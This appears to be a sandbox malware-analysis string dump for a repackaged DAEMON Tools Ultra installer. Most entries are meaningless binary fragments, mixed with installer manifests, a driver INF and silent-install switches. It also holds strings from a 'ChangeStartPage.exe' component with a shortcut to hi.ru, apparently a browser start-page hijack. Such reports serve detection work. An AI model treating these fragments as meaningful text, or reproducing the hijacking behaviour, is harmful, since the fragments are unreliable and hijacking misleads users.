Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9998888889

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9<y2Rxl41

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9``f]pLL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9g;m=

Ansi based on Dropped File (imgengine.dll.62529018)

9i!;*w Ml2vF:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9JDcof(3(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9L:,;k;r;

Ansi based on Dropped File (imgengine.dll.62529018)

9N4t.9

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

9NKLNNK\\P^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9RBe,V2ry

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9thHjtkng

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

9YL-L9NKYYP^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /D=

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /ND

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /NS

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /EN

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /RU

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: /S /UA

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

: Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe /S /RU /D=C:\MyProgram

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

:%@$:TwmH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:%YsN7?_7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:(:0:8:

Ansi based on Dropped File (imgengine.dll.62529018)

:) L7)jy[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:*;P;

Ansi based on Dropped File (imgengine.dll.62529018)

:02"/><file name="Uninstall.exe" size="877450" date="11-24-2016" time="17:44"/><file name="VDriveLib.dll" size="745744" date="

Unicode based on Runtime Data (dtinst.exe )

:1=a Isz Gx@i8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:7Ej]W5OE

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:848N;$RF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

::$DATA

Unicode based on Dropped File (JSSys3.dll.204366558)

:;==>!7<>7

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

:[RoXDPq]yt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:\>f>v>

Ansi based on Dropped File (imgengine.dll.62529018)

:\Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe"

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

:a3]3nq|qL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:blmtQBF,{Z,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:encryptable:$DATA

Unicode based on Dropped File (JSSys3.dll.204366558)

:gZn8k|&d=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:HNYZi"~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:qa4Q-cm)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:Ww)f~Jl6V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

:y="UJSOiYH=1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above

Ansi based on Dropped File (SET4F37.tmp)

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above[Version]signature = "$WINDOWS NT$"Class = SCSIAdapterClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}Provider = %Vendor%CatalogFile = dtultrascsibus.catD

Ansi based on Runtime Data (DiscSoftBusService.exe )

; DTULTRASCSIBUS.INF -- DTULTRASCSIBUS device .inf for Windows XP and above[Version]signature = "$WINDOWS NT$"Class = SCSIAdapterClassGUID = {4D36E97B-E325-11CE-BFC1-08002BE10318}Provider = %Vendor%CatalogFile = dtultrascsibus.catDriverVer=12/08/2014,5.24.0.0[DestinationDirs]DefaultDestDir = 12[SourceDisksNames.x86]1 = %MediaDescription%[SourceDisksFiles]dtultrascsibus.sys = 1[Manufacturer]%Vendor% = Vendor, NTx86[Vendor.NTx86]%DTULTRASCSIBUS.DeviceDesc% = DTULTRASCSIBUS, root\dtultrascsibus[DTULTRASCSIBUS.NTx86]CopyFiles = Drivers_Dir[DTULTRASCSIBUS.NTx86.HW]AddReg = DTULTRASCSIBUS.NTx86.AddReg[DTULTRASCSIBUS.NTx86.AddReg]HKR,,DeviceCharacteristics,0x10001,0x0100 ; Use same security checks on relative opensHKR,,Security,,"D:P(A;;GA;;;SY)(A;;GA;;;BA)" ; Allow generic-all access to Local system and Built-in administrators[DTULTRASCSIBUS.NTx86.Services]AddService = dtultrascsibus, 2, DTULTRASCSIBUS_ServiceInstall[DTULTRASCSIBUS_ServiceInstall]DisplayName = %DTULTRASCSIBUS.DeviceDesc%ServiceType = 1StartType = 3ErrorControl = 1ServiceBinary = %12%\dtultrascsibus.sysLoadOrderGroup = SCSI Miniport[Drivers_Dir]dtultrascsibus.sys;; Strings;[Strings]MediaDescription = "DAEMON Tools Ultra Virtual SCSI Bus Driver"Vendor = "Disc Soft Ltd"DTULTRASCSIBUS.DeviceDesc = "DAEMON Tools Ultra Virtual SCSI Bus"

Ansi based on Dropped File (SET4F37.tmp)

; Strings

Ansi based on Dropped File (SET4F37.tmp)

;$;F;m<

Ansi based on Dropped File (imgengine.dll.62529018)

;$IHl,]f!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;(<n<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

;4DCD^?91s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;8<<3503+..+++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;:9R+"nwN

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;;NqiIAS"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;;t<4<23/0.+0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;<[+2J{ef

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;>"B7291Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;FL<2+w7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;GR;;;WD)

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

;rRI{5ON

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;T)f[xafzk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;Vw_4=1K#NC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;w`+;RaBn

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;Wzz,P-Vp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

;Yagjlkga^\[[`fkmoojY=

Ansi based on Dropped File (Uninstall.exe.212096218)

;{{X/v@*l

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<$<(<,<4<L<

Ansi based on Dropped File (imgengine.dll.62529018)

<%.1Piruu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<%?KUS+C0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<,/io$u.w

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<6hc!|".

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<9+,]lrT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<<<=H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00438000.00000002.mdmp)

<]s~D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel> </requestedPrivileges> </security> </trustInfo></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.0084C000.00000002.mdmp)

<GetColorDepthBPP

Ansi based on Dropped File (JSSys3.dll.204366558)

<H_a3aA

Ansi based on Image Processing (screen_4.png)

<i u@aMV3T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<k7B[4DcD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<NULL>

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

<p@8`otp

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<program name unknown>

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

<PYPm"@b.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<t<tx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<T=Y=!>&>

Ansi based on Dropped File (imgengine.dll.62529018)

<tt<xx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

<|Ve'#XF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRe

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

=$vF.zede

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=+>:>I>

Ansi based on Dropped File (imgengine.dll.62529018)

==!!<

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

==kW]Q;7W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=@r!lFNc!(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=aIo|RG;Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=h=C}d4\k

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=M>V>b?k?

Ansi based on Dropped File (imgengine.dll.62529018)

=PN5T3P^Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

=wy{~Ji/P

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>

Ansi based on Dropped File (imgengine.dll.62529018)

>%9\9jE[2F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>&>7>?>M>S>c>h>q>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

>))PY2yf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>)Oa1tAb$#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>+79vsR3C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>1?Q?w?

Ansi based on Dropped File (imgengine.dll.62529018)

>9@8Bfc^?4"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>>> [Device Install (UpdateDriverForPlugAndPlayDevices) - root\dtultrascsibus]>>> Section start 2016/11/24 10:13:00.891 cmd: "%PROGRAMFILES%\DAEMON Tools Ultra\dtinst.exe" /reg_scsi dtultrascsibus {874FDCE0-46C5-4C59-8B25-3159C12C6B86} "DAEMON Too

Ansi based on Runtime Data (dtinst.exe )

>?'h@#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>ahjV$p{3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>b7$RSyT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>C?[?{?

Ansi based on Dropped File (imgengine.dll.62529018)

>eeefjrrxv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>eeefqruu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>Ke7g<>&_M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>N&XtQ.*

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>pd%'Ryb$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>PIAyv[sm,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>pQ_jG09JM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>u9Qoo;bD

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>U]Q?bxq@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>WaZS8E$A~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>YhEx[;+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>|0#7p5JX%}1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>}#6T:{vv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

>}ZS]]C}MuemEyEmiiiu,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

? ?$?(?,?0?4?8?

Ansi based on Dropped File (imgengine.dll.62529018)

? ?(?0?8?

Ansi based on Dropped File (imgengine.dll.62529018)

?"cL=_&O>u

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?"K17t0"m@

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?$?,?4?<?D?

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.0084C000.00000002.mdmp)

?<A%bE;Jp%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?=(H:>0W4BmB9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

??m______

Ansi based on Image Processing (screen_7.png)

?___?_

Ansi based on Image Processing (screen_0.png)

?aC5pF4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?b|QBu^z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?EuzO52Q<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?NRMF?1/4FOUSBL

Ansi based on Dropped File (Uninstall.exe.212096218)

?OQ]7%3geec

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?v__3__?__

Ansi based on Image Processing (screen_7.png)

?xLyzE#lE(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?y[|58h?

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

?YCQXKG\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@%SystemRoot%\system32\dnsapi.dll,-103

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\System32\fveui.dll,-843

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\System32\fveui.dll,-844

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\system32\p2pcollab.dll,-8042

Unicode based on Runtime Data (dtinst.exe )

@%SystemRoot%\system32\qagentrt.dll,-10

Unicode based on Runtime Data (dtinst.exe )

@&<W9\,3C

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@*>s|k#W7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@.data

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@.reloc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

@.rsrc

Ansi based on Dropped File (imgengine.dll.62529018)

@.tgs0

Ansi based on Dropped File (Tages.dll.423655889)

@2Cbd-L=_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@6J9i-'ULF (

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@:WK-Mfl

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@=ala5/Fi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@>FF>DFF>GrZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@@+$+((.033668:;;=>=>><=4

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@@@@@+

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@@@@@@@@@@@@@@@@@@@+

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@BK><^SB

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@e*:N@y,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@FFD>>F>>>>>ZZZr_\WVXeX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@FFFFFFF>HGZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@hHd&!z.ov

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@Microsoft Visual C++ Runtime Library

Unicode based on Dropped File (dtinst.exe.3474642986)

@PcEx_F"}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@s9:+]THJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

@uqVU

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

@~1qqo;>lY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[%Bx\f

Ansi based on Dropped File (imgengine.dll.62529018)

[%E0;`~-N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[6EMlC.hW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[7JUH!TiF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[8[;64;3,//,,++++++.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[9;Z62ph;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[:On1cY'n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[?=0@q3e*y/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[DestinationDirs]

Ansi based on Dropped File (SET4F37.tmp)

[Drivers_Dir]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.AddReg]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.HW]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86.Services]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS.NTx86]

Ansi based on Dropped File (SET4F37.tmp)

[DTULTRASCSIBUS_ServiceInstall]

Ansi based on Dropped File (SET4F37.tmp)

[gz4wq7UV

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[InternetShortcut]URL=http://hi.ru/?11

Ansi based on Runtime Data (ChangeStartPage.exe )

[M&6aGw(f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[M;[66;5,4/,,.,+,+,/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Manufacturer]

Ansi based on Dropped File (SET4F37.tmp)

[P& ^O92\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Rename]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[SourceDisksFiles]

Ansi based on Dropped File (SET4F37.tmp)

[SourceDisksNames.x86]

Ansi based on Dropped File (SET4F37.tmp)

[SS[96;4644,,3,,4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Strings]

Ansi based on Dropped File (SET4F37.tmp)

[Stt88<435/+..

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Sxt4;=43<5+.0+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[vbEmG7A3i

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

[Vendor.NTx86]

Ansi based on Dropped File (SET4F37.tmp)

[Version]

Ansi based on Dropped File (SET4F37.tmp)

[|ezi

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\43VNeoC\AppData\Local\Temp\nsrD151.tmp\nsDialogs.dll

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00424000.00000004.mdmp)

\??\VOLUME

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\\.\MountPointManager

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

\^Fw'=[yF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\_Yl_V)3S;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\_Yp83]T?g

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\CLSID

Unicode based on Dropped File (JSSys3.dll.204366558)

\cR:s`0)Xp+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

\Device\

